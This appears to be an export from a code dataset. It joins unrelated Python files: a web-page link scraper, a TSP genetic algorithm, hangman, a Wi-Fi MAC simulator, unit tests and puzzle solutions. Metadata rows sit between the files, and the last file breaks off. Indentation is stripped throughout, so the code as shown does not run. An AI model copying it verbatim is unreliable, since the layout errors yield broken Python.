logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
class XPath:
@staticmethod
def get_soup(file: str) -> BeautifulSoup:
f = open(file)
soup = BeautifulSoup(f, features="lxml")
f.close()
return soup
@staticmethod
def compare(origin: dict, other: dict) -> bool:
return origin["text"].lower().strip() == other["text"].lower().strip() or origin["attrs"].get("id") and \
origin["attrs"]["id"] == other["attrs"].get("id") or \
origin["attrs"].get("class") and \
origin["attrs"]["class"] == other["attrs"].get("class")
def look_for_children_or_result(self, child: bs4.element.Tag, origin: dict) -> dict or None:
try:
other = {"attrs": child.attrs, "text": child.text}
if self.compare(origin, other):
return {"result": child}
else:
return {"child_list": list(child.children)}
except AttributeError:
return None
def look_for_result(self, button_parent: bs4.element.Tag, button_origin: dict):
button_in = list(button_parent.children)
result = None
while not result and button_in:
child_list = []
# next look for button in list of child or deeper
for child in button_in:
if self.look_for_children_or_result(child, button_origin) is None:
continue
elif self.look_for_children_or_result(child, button_origin).get("result"):
result = self.look_for_children_or_result(child, button_origin)["result"]
return result
else:
child_list.append(self.look_for_children_or_result(child, button_origin)["child_list"])
button_in = child_list
return None
def find_element(self, origin_file: str, other_file: str,
id_name: str = "make-everything-ok-button") -> dict or None:
soup = self.get_soup(origin_file)
soup_other = self.get_soup(other_file)
# find attrs and text of original button
button = soup.find(id=id_name)
button_origin = {"attrs": button.attrs, "text": button.text}
# find list of patents for original button
path = []
parents_origin = list(button.parents)
for parent in parents_origin:
path.append((parent.name, parent.attrs))
# look for first parent of original button that we have in other document as well
result = None
for parent in path:
button_parent = soup_other.find_all(attrs=parent[1])
if button_parent:
# look for list of children for that element
for item in button_parent:
result = self.look_for_result(item, button_origin)
if result:
logging.info(f"element was found in the new file: {result}")
return result
return result
@staticmethod
def xpath(element: bs4.element.Tag) -> str:
tags = []
child = element if element.name else element.parent
for parent in child.parents:
siblings = parent.find_all(child.name, recursive=False)
tags.append(
child.name if 1 == len(siblings) else '%s[%d]' % (
child.name,
next(i for i, s in enumerate(siblings, 1) if s is child)
)
)
child = parent
tags.reverse()
return '/%s' % '/'.join(tags)
def run():
element = XPath().find_element(origin_file=sys.argv[1], other_file=sys.argv[2])
path = XPath.xpath(element)
logging.info(f"XPath:: {path}")
return path
run()
| true
|
f8d656f5b90fc7dd4a0c92b1d6ae8279f179b47a
|
Python
|
jjauzion/salesman_problem
|
/src/optimisation.py
|
UTF-8
| 3,619
| 3.03125
| 3
|
[] |
no_license
|
# -*-coding:Utf-8 -*
import random
import matplotlib.pyplot as plt
import time
import math
from src.city import City
from src.individual import Individual
from src.population import Population
import src.param as param
class Optimisation():
"""Class Optimisation run the genetic algorithm to solve the TSP"""
def __init__(self, city_map="random"):
"""
Create a new class instance with a list of city to visit.
Number of cities in the list is defined in the param package.
Options:
city_map="random" : cities have random coordinates
city_map="circle" : cities are distributed around a circle.
The radius defined by max_x in the param package
"""
self.city2travel = []
if city_map == "random":
for i in range(param.nb_of_city):
self.city2travel.append(City(param.max_x, param.max_y))
self.x_min = 0
self.x_max = param.max_x
self.y_min = 0
self.y_max = param.max_y
elif city_map == "circle":
a = b = 0
r = param.max_x
for theta in range(0, 360, 360 // param.nb_of_city):
x = a + r * math.cos(theta * math.pi / 180)
y = b + r * math.sin(theta * math.pi / 180)
new_city = City(1)
new_city.setXY(x, y)
self.city2travel.append(new_city)
self.x_min = -param.max_x
self.x_max = param.max_x
self.y_min = -param.max_y
self.y_max = param.max_y
else:
raise ValueError("Wrong city map option to initialise Optimisation")
def run(self, max_iter, show=None):
"""
Run the optimisation loop until ...
If show="convergence", the convergence curve will be printed at each step.
If show="best", the best individue of the current population will be shown.
"""
population = Population()
population.random_population(self.city2travel, param.population_size)
self.best_fitness = [population.best_performer.fitness]
x_convergence = [0]
if show:
if show == "best":
(x, y) = population.best_performer.get_plot_data()
x_min = self.x_min
x_max = self.x_max
y_min = self.y_min
y_max = self.y_max
elif show == "convergence":
(x, y) = (x_convergence, self.best_fitness)
x_min = 0
x_max = max_iter
y_min = 0
y_max = self.best_fitness[0]
else:
raise ValueError("Wrong option for show")
plt.show()
plt.axis([x_min, x_max, y_min, y_max])
axes = plt.gca()
line, = axes.plot(x, y, 'r-')
for i in range(1, max_iter):
population = population.next_generation()
if Population.final:
break
self.best_fitness.append(population.best_performer.fitness)
if show:
x_convergence.append(i)
if show == "best":
(x, y) = population.best_performer.get_plot_data()
elif show == "convergence":
(x, y) = (x_convergence, self.best_fitness)
line.set_xdata(x)
line.set_ydata(y)
plt.draw()
plt.pause(1e-17)
time.sleep(0.01)
if show:
plt.show()
return population
| true
|
1654606218f4866df09a8fee07ffa201e2a9bd28
|
Python
|
3esawe/Gabumon
|
/main/HTMLscanner.py
|
UTF-8
| 2,208
| 2.6875
| 3
|
[] |
no_license
|
import requests
from bs4 import BeautifulSoup
import re
from freq.utils import writeFile
links = []
script_links = []
img_src = []
keywrods = ['a', 'img', 'script']
def source(url, out=None, js =False):
if "http://" not in url and "https://" not in url:
print("[+] You forgot to enter http:// or https://")
# print(url)
req = requests.get(url)
if out == None:
srcAnlayzer(req.text)
Links(req.text)
else:
srcAnlayzer(req.text, out)
Links(req.text, out)
def Links(source_code, out = None):
links = []
matches = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', source_code)
for match in matches:
if out == None:
print(match)
else:
writeFile(match, out)
def srcAnlayzer(source_code, out = None):
soap = BeautifulSoup(source_code,features="lxml")
for key in keywrods:
if key == 'a' and soap.a != None:
tag = soap.a
links.append([a['href'] for a in soap.find_all('a', {"href":True})])
elif key == 'script' and soap.script != None :
tag = soap.script
content = soap.script.string
script_links.append([s['src'] for s in soap.find_all('script', {'src':True})])
elif key == 'img':
tag = soap.img
if tag != None:
img_src.append([s['src'] for s in soap.find_all('img', {'src':True})])
else:
exit("No URL has been found")
if out != None:
with open(out ,'w') as handle:
for i in range(len(links[0])):
if i == 0:
handle.write('********************href links********************')
handle.write('\n%s\n' % links[0][i])
for i in range(len(script_links[0])):
if i == 0:
handle.write('\n********************script links********************\n')
handle.write('%s\n' % script_links[0][i])
for i in range(len(img_src[0])):
if i == 0:
handle.write('\n********************img links********************\n')
handle.write('\n%s\n' % img_src[0][i])
else:
for i in range(len(links[0])):
print('%s' % links[0][i])
for i in range(len(script_links[0])):
print('%s' % script_links[0][i])
for i in range(len(img_src[0])):
print('%s' % img_src[0][i])
| true
|
4d2f4c081ff066a7e3f027a883d323e8318ea378
|
Python
|
sk39454/TD_2020_139454
|
/Lab 01/Lab01.py
|
UTF-8
| 2,001
| 3.234375
| 3
|
[] |
no_license
|
import math
import numpy as np
import matplotlib.pyplot as plt
import array
a=4;b=5;c=4;
delta=(b*b)+((-4)*a*c)
if delta == 0:
x1 = (-b) / (2 * a)
print('x1 = ',x1,'\n\n')
if delta > 0:
x1 = ((-b)-(math.sqrt(delta)))/(2*a)
x2 = ((-b)+(math.sqrt(delta)))/(2*a)
print('x1 = ',x1,'\n','x2 = ',x2,'\n\n')
if delta < 0:
print('Brak miejsc zerowych')
xcords1 = [] ; acords = [] ; xcords = [] ; ycords = [] ; zcords = [] ; ucords = [] ; vcords1 = [] ;vcords2 = [] ;vcords3 = [] ; pcords = []
x=-10
while x < 10:
xcords1.append(x)
fx = (a * (x * x)) + (b * x) + c
acords.append(fx)
x=x+0.01
x=round(x,2)
x=0
while x < 1:
xcords.append(x)
fx = (a * (x * x)) + (b * x) + c
funkcja = (2 * (fx * fx)) + (12*math.cos(x))
ycords.append(funkcja)
funkcja2 = (math.sin(2*math.pi*7*x)*fx)-0.2*math.log((abs(funkcja)+math.pi),10)
zcords.append(funkcja2)
funkcja3 = math.sqrt(abs(funkcja*funkcja*funkcja2))-1.8*math.sin(0.4*x*funkcja2*funkcja)
ucords.append(funkcja3)
if 0.22 > x >= 0:
funkcja41 = (1-(7*x))*math.sin((2*math.pi*x*10)/(x+0.04))
vcords1.append(funkcja41)
if 0.22 <= x < 0.7:
funkcja42 = 0.63 * x * math.sin(125*x)
vcords2.append(funkcja42)
if 1 >= x >= 0.7:
funkcja43 = math.pow(x,-0.662)+0.77*math.sin(8*x)
vcords3.append(funkcja43)
n=1
N=45
wynik=0
while n < N :
funkcja5=(math.cos(12*x*(n*n))+math.cos(16*x*n))/(n*n)
wynik=wynik+funkcja5
n+=1
pcords.append(wynik)
x=x+(1/22050)
x=round(x,6)
fig, axs=plt.subplots(6)
fig.suptitle('Vertically stacked subplots')
axs[0].plot(xcords1,acords)
axs[1].plot(xcords,ycords)
axs[2].plot(xcords,zcords)
axs[3].plot(xcords,ucords)
#Wykres 4
len1=len(vcords1)
len2=len(vcords1)+len(vcords2)
len3=len2+len(vcords3)
axs[4].plot(xcords[:len1],vcords1)
axs[4].plot(xcords[len1:len2],vcords2)
axs[4].plot(xcords[len2:len3],vcords3)
axs[5].plot(xcords,pcords)
plt.show()
| true
|
0073f11d8668d96bd13c6276b9ebe662ea98dc5e
|
Python
|
amritaravishankar/Hangman
|
/hangman_main.py
|
UTF-8
| 4,425
| 4.21875
| 4
|
[] |
no_license
|
import random
from words import word_list
def get_word():
word = random.choice(word_list)
return word.upper()
def play(word):
word_completion = "_ " * len(word)
not_guessed = True
guessed_words = []
guessed_letters = []
tries = 6 # (head + body + 2 hands + 2 legs)
print("\n")
print("----------------------HANGMAN-----------------------")
print('The rules of the game are easy:')
print('Guess the word by one letter at a time or the entire word!')
print("Let's play!!!")
print(display_hangman(tries))
print(word_completion)
print("\n")
while not_guessed and tries > 0:
guess = input("Please guess a letter or a word: ").upper()
if len(guess) == 1 and guess.isalpha():
if guess in guessed_letters:
print("You've already guessed ", guess, " earlier!")
elif guess not in word:
print(guess, "is not in the word")
tries = tries - 1
guessed_letters.append(guess)
else:
print("Good Job, ", guess, " is in the word")
guessed_letters.append(guess)
word_list = word_completion.split()
for i in range(len(word)):
if word[i] == guess:
word_list[i] = guess
word_completion = ' '.join(word[0] for word in word_list)
if "_ " not in word_completion:
not_guessed = False
elif len(guess) == len(word) and guess.isalpha():
if guess in guessed_words:
print("You've already guessed ", guess, " earlier!")
elif guess != word :
print(guess, " is not the word.")
tries = tries-1
guessed_words.append(guess)
else:
not_guessed = False
word_completion = word
else:
print("Not a valid guess")
print(display_hangman(tries))
print(word_completion)
print("\n")
if not not_guessed:
print("Congrats, you guessed the word! You win!")
else:
print("Sorry, you ran out of tries. The word was " + word + ". Maybe next time!")
def display_hangman(tries):
stages = [ # final state: head, torso, both arms, and both legs
"""
--------
| |
| O
| \\|/
| |
| / \\
-
""",
# head, torso, both arms, and one leg
"""
--------
| |
| O
| \\|/
| |
| /
-
""",
# head, torso, and both arms
"""
--------
| |
| O
| \\|/
| |
|
-
""",
# head, torso, and one arm
"""
--------
| |
| O
| \\|
| |
|
-
""",
# head and torso
"""
--------
| |
| O
| |
| |
|
-
""",
# head
"""
--------
| |
| O
|
|
|
-
""",
# initial empty state
"""
--------
| |
|
|
|
|
-
"""
]
return stages[tries]
def main():
word = get_word()
play(word)
answer = input("Play again? Y/N ").upper()
if answer == "Y":
word = get_word()
play(word)
if __name__ == "__main__":
main()
| true
|
080ce631b7ce896d9650d31eb660b640fae0695f
|
Python
|
CRingrose94/ProjectEuler
|
/problems_000_099/Euler 005.py
|
UTF-8
| 603
| 3.890625
| 4
|
[] |
no_license
|
def check_divisibility(n):
"""Check if n is divisible by all numbers up to 20.
Being divisible by numbers 11->20 means it is implicitly divisible by numbers 1->10 too.
"""
for divisor in range(11, 21):
if n % divisor != 0:
return False
return True
def compute():
"""Calculates the smallest positive number evenly divisible by 1->20.
The lowest common factor of {1, 2 ... 20} is 2520, so this is the increment.
"""
x = 2520
while not check_divisibility(x):
x += 2520
return x
if __name__ == '__main__':
print(compute())
| true
|
da1f4c56e40aacbb29b1690a57b18b8f5a68d15a
|
Python
|
denny-Madhav/PYTHON-BASIC-PROJECTS
|
/list/split challenge.py
|
UTF-8
| 367
| 3.890625
| 4
|
[] |
no_license
|
import random
print('Hai, welcome.!! Enter names of all customers with "," in between and let me choose one customer to pay the bill. \n ')
names=input("enter here : ")
sname=names.split(",")
print("\nThe name are : ")
print(*sname,sep="\n")
limit=len(sname)
ran=random.randint(0,limit-1)
print(f"\nWell i choose {sname[ran]} to pay the bill.!")
| true
|
580d8c3e55a8a69b0cbdfc2e60908595ace60a51
|
Python
|
yumensiye/firstfortest
|
/applydata.py
|
UTF-8
| 331
| 2.8125
| 3
|
[] |
no_license
|
test = "[15Fall . MS . AD无奖 ] [ DateScience/Analytics @ MSDS@NYU ] - 2015-03-07 - T : 107 + G : 321 () 本科:南大,浙大,复旦,上交 , ... 2 3"
new_string = test.replace(" " , "").split("]")
univer_info = new_string[1].replace("[", "").split("@")
date = new_string[2].split("-")
print(date)
print(univer_info)
| true
|
dd43b912def80fcd32d5e5ce215b9e14d86ac3d9
|
Python
|
ronzohan/bank_app
|
/test/unit/account_test.py
|
UTF-8
| 539
| 3.25
| 3
|
[] |
no_license
|
import unittest
from bankapp.account import Account
class TestAccount(unittest.TestCase):
def test_account_object_returns_current_balance(self):
account = Account(001, 50)
self.assertEqual(account.account_number, 001)
self.assertEqual(account.balance, 50)
def test_accout_balance_is_string(self):
acc = Account("001", "50")
self.assertEqual(acc.balance, acc.balance)
def test_accout_balance_is_invalid_number(self):
self.assertRaises(TypeError, Account, "001", "abc")
| true
|
1a3dd4fd8c67a1dc335f0b7423d99bda4038aaee
|
Python
|
jlmurphy3rd/code-outhouse
|
/StructuresInPython/src/root/nested/DictionaryExercise.py
|
UTF-8
| 511
| 2.859375
| 3
|
[
"MIT"
] |
permissive
|
'''
Created on May 18, 2016
@author: John
'''
name = raw_input("Enter file:")
if len(name) < 1 : name = "mbox-short.txt"
handle = open(name)
counts = dict()
for line in handle:
wds = line.split()
if len(wds) < 2 : continue
if wds[0] != "From" : continue
email = wds[1]
counts[email] = counts.get(email,0) + 1
bigcount = None
bigname = None
for name,count in counts.items():
if bigname is None or count > bigcount:
bigname = name
bigcount = count
print bigname, bigcount
| true
|
6136f7f44b436c13545329d0db21fdb9565602e3
|
Python
|
ganyc717/Gobang
|
/graphic.py
|
UTF-8
| 1,947
| 3.46875
| 3
|
[
"MIT"
] |
permissive
|
import tkinter
import config as cfg
from game import Board
class graphicBoard(Board):
def __init__(self):
super(graphicBoard,self).__init__()
self.root = tkinter.Tk()
self.root.geometry('600x600')
self.block_size = 500 // (cfg.board_size - 1)
self.board_width = self.block_size * (cfg.board_size - 1)
self.piece_size = min(30,self.block_size / 1.5)
self.canvas=tkinter.Canvas(self.root,width=600,height=600,bg='gray')
self.canvas.pack()
for i in range(cfg.board_size):
# 50 board margin
self.canvas.create_line(50 + i * self.block_size, 50, 50 + i * self.block_size, 50 + self.board_width,
width=2)
self.canvas.create_line(50, 50 + i * self.block_size, 50 + self.board_width, 50 + i * self.block_size,
width=2)
self.canvas.bind('<Button-1>', self.draw_next_piece_by_click)
self.root.mainloop()
def draw_piece(self,x,y):
if self.current_player:
color = "white"
else:
color = "black"
pix_x_position = 50 + x * self.block_size - self.piece_size / 2
pix_y_position = 50 + y * self.block_size - self.piece_size / 2
self.canvas.create_oval(pix_x_position, pix_y_position, pix_x_position + self.piece_size,
pix_y_position + self.piece_size, fill=color)
self.move(x + y * cfg.board_size)
def draw_next_piece_by_click(self,event):
x = event.x - 50
y = event.y - 50
if x < 0 or y < 0 or x > self.board_width or y > self.board_width:
# the click out of the board
return
x = round(x / self.block_size)
y = round(y / self.block_size)
self.draw_piece(x,y)
end,winner = self.end_game()
if end:
print("end winner is ",winner)
graphicBoard()
| true
|
ccdcee0ee1d67c023f28aa8f99cad03e797aeec5
|
Python
|
tbohne/AOC17
|
/day7/main.py
|
UTF-8
| 3,383
| 3.140625
| 3
|
[] |
no_license
|
import sys
from collections import *
import itertools
stuff = []
# Part 1
def solve_part1(arr):
sol1 = ""
for i in input:
if "->" in i:
x = i.strip().split("->")
arr.append(x)
not_in = True
for i in arr:
for j in arr:
if i != j:
if i[0].split()[0] in j[1]:
not_in = False
if not_in:
sol_with_num = i[0]
sol1 = i[0].split()[0]
print("solution part1: ", sol1)
not_in = True
return sol_with_num
# Part2
class Node:
def __init__(self, name, weight):
self.name = name
self.children = []
self.weight = weight
def add_child(self, child):
self.children.append(child)
def get_weight(self):
sum = self.weight
for i in self.get_children_weights():
sum += i
return sum
def get_children_weight(self):
if (len(self.children) != 0):
children_weights = []
for child in self.children:
children_weights.append(child.get_weight())
return get_children_weights
else:
return [0]
def solve_part2(root, arr, node_dict, first_root, layer, test_vals):
global stuff
print("REC", root)
sum_for_root = 0
tmp_vals = []
for i in arr:
if i[0] == root:
next_level = i[1].split(',')
for j in next_level:
for k in arr:
if j.strip() in k[0]:
solve_part2(k[0], arr, node_dict, first_root, layer + 1, test_vals)
# print("rec done", root)
# sum = 0
for l in next_level:
if root not in first_root:
tmp = node_dict[l.strip()].replace('(', '').replace(')', '')
# print("l: ", l, " --> ", tmp)
sum_for_root += int(tmp)
tmp_vals.append(int(tmp))
solve_part2(l + ' ' + node_dict[l.strip()], arr, node_dict, first_root, layer + 1, test_vals)
# sum += int(node_dict[l.strip()].replace('(', '').replace(')', ''))
# if root not in first_root:
# print(sum + int(node_dict[root.split()[0]].replace('(', '').replace(')', '')))
sum_for_root += int(node_dict[root.split()[0]].replace('(', '').replace(')', ''))
tmp_vals.append(int(node_dict[root.split()[0]].replace('(', '').replace(')', '')))
# print("SUM FOR REC: ", sum_for_root)
layer = 0
if len(tmp_vals) > 1:
print("END REC: ", root, "weight: ", sum(tmp_vals))
del tmp_vals[-1]
stuff += tmp_vals
# print(stuff)
if root in important:
# print("RESET", root)
stuff = []
if __name__ == '__main__':
input = sys.stdin.readlines()
arr = []
sol_with_num = solve_part1(arr)
# Part 2
# We will have to build up the tree
root_with_num = sol_with_num
first_root = root_with_num
print(first_root)
# print("root: ", root_with_num)
node_dict = dict()
for i in input:
x = i.split()
node_dict[x[0]] = x[1]
layer = 0
important = ""
for i in arr:
important += i[0]
test_vals = []
current = root_with_num
solve_part2(root_with_num, arr, node_dict, first_root, layer, test_vals)
| true
|
a484d1789683066e3c27122f15156e1c4f37b0cf
|
Python
|
KABIR-VERMA/HR-ANSWERSET
|
/string_perm/main.py
|
UTF-8
| 632
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'countPerms' function below.
#
# The function is expected to return an INTEGER.
# The function accepts INTEGER n as parameter.
#
def countPerms(n):
# Write your code here
arr = [[1,1,1,1,1]]
for i in range(1, n):
lis = arr[i-1]
temp = [lis[1]% (1000000007), (lis[0] + lis[2])% (1000000007), (lis[0] + lis[1] +\
lis[3] + lis[4])% (1000000007), (lis[2] + lis[4])% (1000000007), lis[0]% (1000000007)]
arr.append(temp)
return sum(arr[-1]) % (1000000007)
| true
|
8abc89225335888e8c9657beadddcf71cbe5c1a8
|
Python
|
Shawnsyx/graduation_project
|
/Dialogue/wo_chatbot/utils.py
|
UTF-8
| 667
| 2.8125
| 3
|
[] |
no_license
|
#!/usr/bin/python
# -*- coding:utf8 -*-
import json
def read_json_file(file_name):
with open(file_name, 'r', encoding='utf-8') as f:
data = json.load(f)
return data
def normalize_text(text):
return text.lower()
def find_entity(text, out, id2tag):
entity = []
positions = []
i = 0
while i < len(out):
if id2tag[out[i]] == 'B':
start = i
i += 1
while i < len(out) and id2tag[out[i]] == 'I':
i += 1
i -= 1
end = i
positions.append([start, end])
entity.append(text[start:end+1])
i += 1
return entity, positions
| true
|
97645399eafba8b5d98c05fd38957fc3fe68862d
|
Python
|
mohammadali110/coursera-google-it-automation-with-python
|
/crash-course-on-python/week3/8_next_for_loop_home_and_away_team.py
|
UTF-8
| 562
| 3.828125
| 4
|
[] |
no_license
|
# teams = [ 'Dragons', 'Wolves', 'Pandas', 'Unicorns']
# for home_team in teams:
# for away_team in teams:
# What should the next line be to avoid both variables being printed with the same value?
# 1. while home_team != away_team:
# 2. for home_team == away_team:
# 3. away_team = home_team
# 4. if home_team != away_team:
# Solution:
teams = [ 'Dragons', 'Wolves', 'Pandas', 'Unicorns']
for home_team in teams:
for away_team in teams:
if home_team != away_team: #option #4
print(home_team+ " vs "+away_team, end=",")
print()
| true
|
dacabfc73eb0fd14655f1b4f1124259fa68816b3
|
Python
|
martijnvanbeers/diagnnose
|
/test/test_activation_reader.py
|
UTF-8
| 3,873
| 2.640625
| 3
|
[
"MIT"
] |
permissive
|
import os
import shutil
import unittest
from typing import List, Sequence
from torch import Tensor
from diagnnose.activations.activation_reader import ActivationReader
from .test_utils import create_and_dump_dummy_activations
# GLOBALS
ACTIVATIONS_DIM = 10
ACTIVATIONS_DIR = "test/test_data"
ACTIVATIONS_NAME = "hx_l0"
NUM_TEST_SENTENCES = 5
class TestActivationReader(unittest.TestCase):
""" Test functionalities of the ActivationReader class. """
@classmethod
def setUpClass(cls) -> None:
# Create directory if necessary
if not os.path.exists(ACTIVATIONS_DIR):
os.makedirs(ACTIVATIONS_DIR)
create_and_dump_dummy_activations(
num_sentences=NUM_TEST_SENTENCES,
activations_dim=ACTIVATIONS_DIM,
max_sen_len=5,
activations_dir=ACTIVATIONS_DIR,
activations_name=ACTIVATIONS_NAME,
num_classes=2,
)
cls.activation_reader = ActivationReader(activations_dir=ACTIVATIONS_DIR)
@classmethod
def tearDownClass(cls) -> None:
# Remove files from previous tests
if os.listdir(ACTIVATIONS_DIR):
shutil.rmtree(ACTIVATIONS_DIR)
def test_read_activations(self) -> None:
""" Test reading activations from a pickle file. """
activations = self.activation_reader.read_activations((0, "hx"))
# Check if the amount of read data is correct
self.assertEqual(
self.activation_reader.data_len,
activations.shape[0],
"Number of read activations is wrong.",
)
# Check how many sentences were processed
# The first activation of a dummy sentence is a vector of ones
start_of_sentences = activations[:, 0] == 1
num_read_sentences = start_of_sentences.sum()
self.assertEqual(
NUM_TEST_SENTENCES, num_read_sentences, "Number of read sentences is wrong"
)
def test_activation_indexing(self) -> None:
first_idx = list(self.activation_reader.activation_ranges.keys())[0]
def seq_shapes(tensors: Sequence[Tensor]) -> List[Sequence[int]]:
shapes = map(lambda t: tuple(t.shape), tensors)
return list(shapes)
self.assertEqual(
seq_shapes(
self.activation_reader[0, {"indextype": "pos", "a_name": (0, "hx")}]
),
seq_shapes(
self.activation_reader[
first_idx, {"indextype": "key", "a_name": (0, "hx")}
]
),
"Activation shape of first sentence not equal by position/key indexing",
)
self.assertEqual(
seq_shapes(self.activation_reader[0:]),
seq_shapes(
self.activation_reader[slice(0, None, None), {"indextype": "key"}]
),
"Indexing all activations by key and position yields different results",
)
self.assertEqual(
seq_shapes(self.activation_reader[0]),
seq_shapes(self.activation_reader[first_idx, {"indextype": "key"}]),
"Activation shape of first sentence not equal by position/key indexing",
)
data_len = self.activation_reader.data_len
ashape = self.activation_reader[
slice(0, data_len // 2, None), {"indextype": "all"}
][0].shape
self.assertTrue(
ashape == (data_len // 2, ACTIVATIONS_DIM),
f"Indexing by all activations is not working: {ashape}",
)
def test_activation_ranges(self) -> None:
self.assertEqual(
sum(
ma - mi for mi, ma in self.activation_reader.activation_ranges.values()
),
self.activation_reader.data_len,
"Length mismatch activation ranges and label length of ActivationReader",
)
| true
|
5a0bd5c8cbd020458c635a046df3e723c22d6406
|
Python
|
jmgraeffe/ieee802-11-simplified-mac-simulator
|
/simulation/__init__.py
|
UTF-8
| 3,732
| 2.90625
| 3
|
[
"MIT"
] |
permissive
|
from enum import Enum
from multiprocessing import cpu_count, Pool
import logging
import collections
import time
class Scheme(Enum):
DCF_BASIC = 1
DCF_NO_BACKOFF_MEMORY = 2
DCF_GLOBAL_CW = 3
CRB = 4,
TBRI = 5 # 3bRI, 3 bit of reservation information, three bit scheduling
@classmethod
def to_human_name(cls, scheme):
if scheme is cls.DCF_BASIC:
return 'DCF'
elif scheme is cls.CRB:
return 'CRB'
elif scheme is cls.TBRI:
return '3bRI'
else:
return str(scheme)
def run(scheme=Scheme.DCF_BASIC, num_stations=50, num_iterations=1000, cw_start=15, cw_end=255):
if scheme is Scheme.DCF_BASIC:
from .schemes.dcf_basic import Simulator
# elif scheme is Scheme.DCF_NO_BACKOFF_MEMORY:
# from .schemes.dcf_nobackoffmemory import Simulator
# elif scheme is Scheme.DCF_GLOBAL_CW:
# from .schemes.dcf_globalcw import Simulator
elif scheme is Scheme.CRB:
from .schemes.crb import Simulator
elif scheme is Scheme.TBRI:
from.schemes.tbri import Simulator
else:
logging.error('Scheme \'{}\' not implemented!'.format(scheme))
return
simulation = Simulator(num_stations, num_iterations, cw_start, cw_end).run()
logging.info('-' * 64)
logging.info('collisions_ap\t\t\t\t= {}'.format(simulation.collisions_ap))
logging.info('collisions_stations\t\t\t= {}'.format(simulation.collisions_stations))
logging.info('successful_transmissions\t= {}'.format(simulation.successful_transmissions))
logging.info('-' * 64)
return simulation
def run_process(args):
return run(*args)
def run_multiple(range_iterations, schemes, range_stations, cw_start=15, cw_end=255):
simulations = collections.OrderedDict()
process_args = []
for num_iterations in range_iterations:
simulations[num_iterations] = collections.OrderedDict()
for scheme in schemes:
simulations[num_iterations][scheme] = collections.OrderedDict()
for num_stations in range_stations:
process_args.append((scheme, num_stations, num_iterations, cw_start, cw_end))
with Pool(processes=int(3 * cpu_count() / 4)) as pool:
results = pool.map(run_process, process_args)
for result in results:
simulations[result.num_iterations][result.scheme][result.num_stations] = result
return simulations
def run_multiple_averaged(num_simulations, range_iterations, schemes, range_stations, cw_start=15, cw_end=255):
start = time.time()
first = run_multiple(range_iterations, schemes, range_stations, cw_start, cw_end)
end = time.time()
print("1. simulation finished in {} seconds!".format(end - start))
# add statistics of all missing simulations to the first one
for num_simulation in range(num_simulations - 1):
start = time.time()
simulations = run_multiple(range_iterations, schemes, range_stations, cw_start, cw_end)
end = time.time()
print("{}. simulation finished in {} seconds!".format(num_simulation + 2, end - start))
for num_iterations, simulations1 in simulations.items():
for scheme, simulations2 in simulations1.items():
for num_stations, simulation in simulations2.items():
first[num_iterations][scheme][num_stations].add(simulation)
# divide everything to get average
for num_iterations, simulations1 in first.items():
for scheme, simulations2 in simulations1.items():
for num_stations, simulation in simulations2.items():
first[num_iterations][scheme][num_stations].divide_by(num_simulations)
return first
| true
|
9471161cd0bef6ac1008befc01ab0cbc5730ea51
|
Python
|
eyurtsev/kor
|
/tests/test_type_descriptors.py
|
UTF-8
| 3,023
| 2.96875
| 3
|
[
"MIT"
] |
permissive
|
import pytest
from kor import Number, Object, Text
from kor.nodes import Bool, Option, Selection
from kor.type_descriptors import BulletPointDescriptor, TypeScriptDescriptor
OPTION_1 = Option(id="blue", description="Option Description", examples=["blue"])
OPTION_2 = Option(id="red", description="Red color", examples=["red"])
NUMBER = Number(
id="number", description="Number Description", examples=[("number", "2")]
)
TEXT = Text(id="text", description="Text Description", examples=[("text", "3")])
BOOL = Bool(id="bool", description="Bool Description", examples=[("bool", True)])
SELECTION = Selection(
id="selection",
description="Selection Description",
options=[OPTION_1],
null_examples=["foo"],
)
SELECTION_2 = Selection(
id="selection2",
description="Selection2 Description",
options=[OPTION_1, OPTION_2],
null_examples=["foo"],
many=True,
)
OBJ = Object(
id="object",
description="Object Description",
examples=[("another number", {"number": "1"})],
attributes=[NUMBER, TEXT, SELECTION, SELECTION_2, BOOL],
)
def test_no_obvious_crashes() -> None:
"""Lightweight test to verify that we can generate type descriptions for nodes.
This test doesn't verify correctness, only that code doesn't crash!
"""
nodes_to_check = [OBJ]
descriptors = [TypeScriptDescriptor(), BulletPointDescriptor()]
for node in nodes_to_check:
# Verify that we can generate description
for descriptor in descriptors:
assert isinstance(descriptor.describe(node), str)
@pytest.mark.parametrize(
"node,description",
[
(
OBJ,
(
"* object: Object # Object Description\n"
"* number: Number # Number Description\n"
"* text: Text # Text Description\n"
"* selection: Selection # Selection Description\n"
"* selection2: Selection # Selection2 Description\n"
"* bool: Bool # Bool Description"
),
),
],
)
def test_bullet_point_descriptions(node: Object, description: str) -> None:
"""Verify bullet point descriptions."""
assert BulletPointDescriptor().describe(node) == description
@pytest.mark.parametrize(
"node,description",
[
(
OBJ,
(
"```TypeScript\n"
"\n"
"object: { // Object Description\n"
" number: number // Number Description\n"
" text: string // Text Description\n"
' selection: "blue" // Selection Description\n'
' selection2: Array<"blue" | "red"> // Selection2 Description\n'
" bool: boolean // Bool Description\n"
"}\n"
"```\n"
),
),
],
)
def test_typescript_description(node: Object, description: str) -> None:
"""Verify typescript descriptions."""
assert TypeScriptDescriptor().describe(node) == description
| true
|
e138fca39f8debc4be770733fc026b6c45b6b7f7
|
Python
|
etwuerschmidt/advent-of-code
|
/2019/Day_2/Puzzle_2/solution.py
|
UTF-8
| 1,340
| 3.453125
| 3
|
[] |
no_license
|
def find_inputs(filename):
ops = reset_ops(filename)
for noun in range(0, 100):
for verb in range(0, 100):
ops[1] = noun
ops[2] = verb
if parse_op_codes(ops) == 19690720:
return 100 * noun + verb
else:
ops = reset_ops(filename)
ops = reset_ops(filename)
print("No noun and verb found to return value 19690720.")
exit(1)
def parse_op_codes(ops):
for position in range(0, len(ops), 4):
if ops[position] == 99:
return ops[0]
elif ops[position] != 1 and ops[position] != 2:
print(
f"Parsing ops ({ops[position]}, {ops[position+1]}, {ops[position+2]}, {ops[position+3]})")
print(f"Unknown opcode {ops[position]} found.")
exit(1)
input_1 = ops[position+1]
input_2 = ops[position+2]
output = ops[position+3]
if ops[position] == 1:
ops[output] = ops[input_1] + ops[input_2]
elif ops[position] == 2:
ops[output] = ops[input_1] * ops[input_2]
return ops[0]
def reset_ops(filename):
with open(filename, 'r') as f:
ops = f.readline().split(',')
ops = [int(op) for op in ops]
